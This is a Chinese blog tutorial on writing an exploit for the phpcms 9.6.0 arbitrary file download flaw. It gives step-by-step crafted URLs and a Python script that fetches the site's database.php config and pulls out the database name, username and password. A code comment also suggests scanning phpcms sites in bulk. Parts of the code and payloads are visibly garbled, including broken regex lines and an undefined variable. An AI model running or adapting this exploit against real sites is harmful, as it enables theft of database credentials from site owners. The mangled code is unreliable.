导读 | 学习编写漏洞利用exp,其实原理很简单,就是模拟人工操作。利用代码将漏洞步骤一步步展现出来,今天我们就来和大家一起学习如何编写你自己的exp |
实验工具:firefox,burp,phpcms9.6.0
实验语言:Python3.4
实验环境:php+mysql+apache
首先我们先来看看今天的phpcms任意文件下载漏洞复现步骤
这里可以建议大家去看下phpcms任意文件下载代码审计的思路流程。然后再来实际复现一遍。
漏洞复现流程就是按照我们下方的每一步链接走下去!
我们先来获取phpcms/modules/wap/index.php中的cookie值
http://127.0.0.1:9096/phpcms0/index.php?m=wap&c=index&a=init&siteid=1
修改标红部分的文件即为自己想要下载的文件,这里标红部分就是你想要下载的内部文件。也就是在第二部构造我们的下载链接。对应的是构造的payload
http://127.0.0.1:9096/phpcms0/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=&i=1&m=1&d=1&modelid=1&catid=1&s=./caches/configs/database.ph&f=p%3%2%2*70
访问该链接得到_att_json值
http://127.0.0.1:9096/phpcms0/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=&i=1&m=1&d=1&modelid=1&catid=1&s=./caches/configs/database.ph&f=p%3%252%2]index.ph… h&f=p%3%252%2*70C
通过获取到的_att_json值来构造下载payload
通过增加json值认证去访问构造好的下载链接。将get请求中的a_k参数值替换成获取到的_att_json值,并且请求即可。这里后面的标红部分就是获取到的_att_json值
最后点击“点击下载”按钮,即可下载/caches/configs/database.php文件
漏洞复现流程走完之后我们就要来按照漏洞复现流程进行编写我们的exp:
#-*-coding=utf-8 -*- #author = Free雅轩 importrequests #导入requests模块,模拟爬取访问网页 importre #导入re正则模块,对网页中我们所需的内容进行匹配 fromurllib.parse import quote #从urllib.parse模块中导入quote方法,用于对传递进来的url进行编码re TIMEOUT= 3 #设置网页响应超时时间为3秒 url= r'http://127.0.0.1:9096/phpcms9.0' #定义URL地址 #这里其实是可以利用采集工具/模拟引擎来进行爬取PHPCMS的关键字来进行批量读取/验证操作 payload=r'&id=1&m=1&f=caches/configs/database.ph%3C&modelid=1&catid=1&s=&i=1&d=1&' #定义漏洞利用payload cookies= {} #设置cookie #步骤一 获取cookie step1= '{}/index.php?m=wap&c=index&a=init&siteid=1/'.format(url) print('step1:{}'.format(step1)) #模拟人工操作构造第一个payload response1_cookies= requests.get(step1 , timeout=3).cookies #将第一步的url和cookies结合并赋值给response_cookies,设置url响应超时时间为3秒 fori in response1_cookies: print(i) if i.name[-7:] == '_siteid': cookies_head = i.name[:6] cookies[cookies_head + '_userid' ] = i.value cookies[i.name] = i.value print(cookies) #步骤二 获取_att_json step2='{}/index.php?m=attachment&c=attachments&a=swfupload_json&src={}'.format(url, quote(payload)) print('step2:{}'.format(step2)) response2_cookies= requests.get(step2 , timeout=3 , cookies=cookies).cookies forj in response2_cookies: if j.name[-9:] == '_att_json': enc_payload = j.value #步骤三 获取构造下载链接 step3= '{}/index.php?m=content&c=down&a_k={}'.format(url,enc_payload) print('step3:{}'.format(step3)) #步骤四 利用requests模块中的text方法将网页输出,将获取到的链接中的db,username,password等重要信息匹配出来 step4= requests.get(step3 , timeout=3 , cookies=cookies).text file= re.findall(r' '([/S]+)'" re_username= r"'username' => '([/S]+)'" re_password= r"'password' => '([/S]+)'" db =re.search(re_db, ret).group(1) username= re.search(re_username, ret).group(1) password= re.search(re_password, ret).group(1) print(db,username, password)
原创文章,作者:ItWorker,如若转载,请注明出处:https://blog.ytso.com/118715.html